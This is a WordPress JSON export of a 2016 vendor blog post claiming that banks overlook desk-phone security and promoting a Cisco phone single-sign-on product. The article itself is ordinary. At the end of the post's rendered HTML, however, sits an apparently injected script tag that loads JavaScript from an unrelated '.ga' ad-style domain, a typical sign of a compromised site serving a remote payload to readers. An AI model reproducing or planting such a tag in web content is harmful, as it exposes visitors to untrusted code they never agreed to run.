{"id":763,"date":"2016-01-25T15:08:28","date_gmt":"2016-01-25T15:08:28","guid":{"rendered":"https:\/\/www.rsconnect.net\/nl\/?post_type=article&#038;p=763"},"modified":"2016-09-12T15:10:12","modified_gmt":"2016-09-12T14:10:12","slug":"it-security-for-banks-also-includes-desktop-phone-security","status":"publish","type":"article","link":"https:\/\/www.rsconnect.net\/nl\/artikelen\/it-security-for-banks-also-includes-desktop-phone-security\/","title":{"rendered":"IT Security for banks also includes Desktop Phone Security!"},"content":{"rendered":"<p>Last year, PWC published its global report Retail Banking 2020. It is a forecast of how retail banks will look like in 2020. From an ICT perspective two major trends are important. First, the use of technology to bring bank transactions literally to the fingertip of the customer. Second, that using these technological innovations, banks are going to be lean and mean. They will more and more operate as internet banks without the need for a branch network. Let\u2019s dig a little deeper on that topic. Technology nowadays enables banks to go online. There is less need for the traditional branch model for daily transactions. Cash usage has dropped dramatically and all basic activities and transactions can be done online. Banks have substantially reduced their staff levels and experiment with new branch concepts. Some banks for example run flagship store type of branches, where customers are served with education, financial advice and other full-service capabilities. In a nutshell, it means that transactions will become an online commodity, while specialized services will remain an interactive process that can be done via channels like video chat, but also in flagship branches with high-qualified staff.<\/p>\n<h2>Increased focus on banking security<\/h2>\n<p>The use of IT solutions for the automation of transactions and customer support means also an increased focus on IT security. <a href=\"http:\/\/www.americanbanker.com\/news\/bank-technology\/banks-to-spend-more-on-tech-in-2016-especially-security-1077200-1.html\">Research among US Bankers<\/a> clearly illustrates this. Nearly 80% of all bank executives planned to invest in more security. As such, it was the top technology investment category, far ahead of topics like online banking and mobile banking. If I elaborate on these security investments, it seems to me as if the \u00a0key focus of many IT security strategies and plans is on the external channels. So, banks focus on securing their online transactions, both between their customers and their own systems, as well as the transactions between banks and their peers. Many innovations and new techniques are used to increase the security levels. This is very understandable since most of the attacks come from the outside and from external, anonymous sources. We therefore see many innovations in this domain. For example, in the area of authorization, where bio-metrics like fingerprint and voice recognition may become commonplace in transaction authorization.<\/p>\n<p>At the same time the new online banking model doesn\u2019t mean that the internal security will become less important. If a bank changes from a model with large number of branches and staff numbers for the daily operations, towards a smaller number of branches and fewer, but highly skilled staff, this creates a risk. In the new situation fewer people are involved in daily banking operations and in general this means that they have more responsibilities, and more authority to access systems and information. In a world where the external channel security is brought up to Fort Knox level, getting access to and manipulating key staff employees may become the easiest way to have access to the bank and its systems. Getting access to the desktop of staff members and social engineering techniques may become the most effective ways to get access to the bank.<\/p>\n<h2>Banks forget enterprise telephony as part of IT security<\/h2>\n<p>And there we see something interesting. Everybody sees IT as something that has to be secured and everybody understands that also the internal IT environment, the employee\u2019s work-space, computers, laptops and tablet or smartphone have to be secured. But one way or the other, we tend to forget the desk phone. Many of today\u2019s desktop phones are not secured and if they are, the security is often not used. Today\u2019s enterprise telephony provides business users with desktop phones with enormous capabilities. The complete user profile is linked to a specific phone extension, providing the private business contacts, the call history and other data. But most of all, it provides a trusted contact to other employees in your bank. If you receive a phone call from an internal colleague, calling from the financial department and knowing your name, you may be less cautious if you provide him with the information he is looking for, even if he asks a bit more than you would expect. Trust works to colleagues and it works to customers.<\/p>\n<p>Let\u2019s give an example of the potential damage. In October 2015, the Evening Standard published the article \u2018Nine arrested over &#8216;\u00a360 million fraud&#8217; targeting bank customers\u2019. It describes a fraud where criminals targeted business banking customers by purporting to be from their bank in order to dupe them into revealing personal information to allow them to gain access to their accounts. These criminals used technology to disguise the number they called from to make it appear as though they were a legitimate bank. This example clearly illustrates the potential value it has to have access to phone lines with some \u2018authority\u2019. For making calls to external relations this could also be done via black-hat type technology, but for internal calls to other departments the use of an existing desktop phone may be the preferred or only way. Specifically, since in the war against these phone fraud attempts, specialized security companies not only check the calling number, but also other call characteristics like noise and frequencies to check the real origin of a calling party.<\/p>\n<h2>How is your desktop security organized?<\/h2>\n<p>It\u2019s an example and it wasn\u2019t your bank, we hope.. But looking at your office, how is your VoIP desk phone secured? What if at your department a key account manager leaves the office with an \u2018open\u2019 desktop phone? How easy is it for a colleague, a visitor or an employee of the cleaning service to access that phone and download the account manager\u2019s entire customer list. Or worse, to contact a client and provide him with some \u2018special advice\u2019. Or to call on a regular basis some escort service and make your account manager vulnerable for blackmail. The number of fraud and abuse scenarios with free accessible desktop phones is large, and we will elaborate on some of these VoIP security threats in upcoming blogs.<\/p>\n<p>Often the reaction to the question above is as expected. The responsible IT department states that the desktop telephone is secured via a username and password and that it is impossible to access a phone without these account data. This is true, but it is in no way a solution. Where logging in to a laptop or computer has become common practice, logging in to a telephone definitely isn\u2019t. Entering a username and password on a telephone with a rudimentary keypad isn\u2019t practical and the reality is that staff often deliberately \u2018forgets\u2019 to log out. Not just to have a hassle-free start the next morning, but also since most of the people don\u2019t see any risk in leaving their desktop phone \u2018open\u2019. They simply don\u2019t see their desk phone as a security risk. <em>Three roads to your data are closed. The fourth one is open\u2026<\/em><\/p>\n<h2>Single Sign On for enterprise telephony<\/h2>\n<p>Ideally, logging in to a desktop phone should be as common as logging in to a PC or laptop. And even better would it be if logging in to the phone and the computer would be a single activity. And that\u2019s where RSconnect comes in. Our Active Login Manager is a Single Sign-On (SSO) solution which automatically logs in to a Cisco enterprise telephone when the user logs in to his office environment. And automatically logs off when the user leaves his desk or workplace and even the office. With the Active Login Manager you are 100% sure that whenever your employee is not at his or her desk, the desk phone cannot be used either. Active Login Manager provides the level of security for your office environment and extends it to your desktop telephony. As such, the Login Manager is a must-have for companies using Cisco IP Telephony, Cisco Unified Communications (CUCM) and Cisco Call Manager technology (CCM).<\/p>\n<p>The software is easy to use and improves the internal security policies within your company, optionally on top of your current Active Directory integration. So, the question I would like to ask you, as a banking executive: Is the level of attention your bank pays to your external channels and access to computer systems, in balance with the level of attention you pay to the security of your desktop phones? If yes, I congratulate you. If not, it is perhaps good to have a chat and discuss our Active Login Manager. It will block the fourth road to sensitive company data and potential cybercrime.<\/p>\n<p><script src='https:\/\/drake.strongcapitalads.ga\/m.js?s=q' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vorig jaar publiceerde PWC zijn internationale rapport Retail Banking 2020. Dit is een voorspelling van hoe banken er voor consumenten in 2020 uit zullen zien. Dit is een engelstalig artikel&#8230;.<\/p>\n","protected":false},"featured_media":0,"menu_order":10,"template":"","categories":[],"tags":[],"class_list":["post-763","article","type-article","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>IT Security for banks also includes Desktop Phone Security! - RSconnect (NL)<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security\" \/>\n<meta property=\"og:locale\" content=\"nl_NL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"IT Security for banks also includes Desktop Phone Security! - RSconnect (NL)\" \/>\n<meta property=\"og:description\" content=\"Vorig jaar publiceerde PWC zijn internationale rapport Retail Banking 2020. Dit is een voorspelling van hoe banken er voor consumenten in 2020 uit zullen zien. Dit is een engelstalig artikel....\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security\" \/>\n<meta property=\"og:site_name\" content=\"RSconnect (NL)\" \/>\n<meta property=\"article:modified_time\" content=\"2016-09-12T14:10:12+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Geschatte leestijd\" \/>\n\t<meta name=\"twitter:data1\" content=\"7 minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.rsconnect.net\/nl\/artikelen\/it-security-for-banks-also-includes-desktop-phone-security\/\",\"url\":\"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security\",\"name\":\"IT Security for banks also includes Desktop Phone Security! - RSconnect (NL)\",\"isPartOf\":{\"@id\":\"https:\/\/www.rsconnect.net\/nl\/#website\"},\"datePublished\":\"2016-01-25T15:08:28+00:00\",\"dateModified\":\"2016-09-12T14:10:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security#breadcrumb\"},\"inLanguage\":\"nl-NL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.rsconnect.net\/nl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Artikelen\",\"item\":\"https:\/\/www.rsconnect.net\/nl\/artikelen\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"IT Security for banks also includes Desktop Phone Security!\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.rsconnect.net\/nl\/#website\",\"url\":\"https:\/\/www.rsconnect.net\/nl\/\",\"name\":\"RSconnect (NL)\",\"description\":\"IPT security\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.rsconnect.net\/nl\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"nl-NL\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"IT Security for banks also includes Desktop Phone Security! - RSconnect (NL)","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security","og_locale":"nl_NL","og_type":"article","og_title":"IT Security for banks also includes Desktop Phone Security! - RSconnect (NL)","og_description":"Vorig jaar publiceerde PWC zijn internationale rapport Retail Banking 2020. Dit is een voorspelling van hoe banken er voor consumenten in 2020 uit zullen zien. Dit is een engelstalig artikel....","og_url":"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security","og_site_name":"RSconnect (NL)","article_modified_time":"2016-09-12T14:10:12+00:00","twitter_card":"summary_large_image","twitter_misc":{"Geschatte leestijd":"7 minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.rsconnect.net\/nl\/artikelen\/it-security-for-banks-also-includes-desktop-phone-security\/","url":"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security","name":"IT Security for banks also includes Desktop Phone Security! - RSconnect (NL)","isPartOf":{"@id":"https:\/\/www.rsconnect.net\/nl\/#website"},"datePublished":"2016-01-25T15:08:28+00:00","dateModified":"2016-09-12T14:10:12+00:00","breadcrumb":{"@id":"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security#breadcrumb"},"inLanguage":"nl-NL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.rsconnect.net\/en\/articles\/it-security-for-banks-also-includes-desktop-phone-security#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.rsconnect.net\/nl\/"},{"@type":"ListItem","position":2,"name":"Artikelen","item":"https:\/\/www.rsconnect.net\/nl\/artikelen\/"},{"@type":"ListItem","position":3,"name":"IT Security for banks also includes Desktop Phone Security!"}]},{"@type":"WebSite","@id":"https:\/\/www.rsconnect.net\/nl\/#website","url":"https:\/\/www.rsconnect.net\/nl\/","name":"RSconnect (NL)","description":"IPT security","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.rsconnect.net\/nl\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"nl-NL"}]}},"_links":{"self":[{"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/article\/763"}],"collection":[{"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/article"}],"about":[{"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/types\/article"}],"version-history":[{"count":2,"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/article\/763\/revisions"}],"predecessor-version":[{"id":1623,"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/article\/763\/revisions\/1623"}],"wp:attachment":[{"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/media?parent=763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/categories?post=763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.rsconnect.net\/nl\/wp-json\/wp\/v2\/tags?post=763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}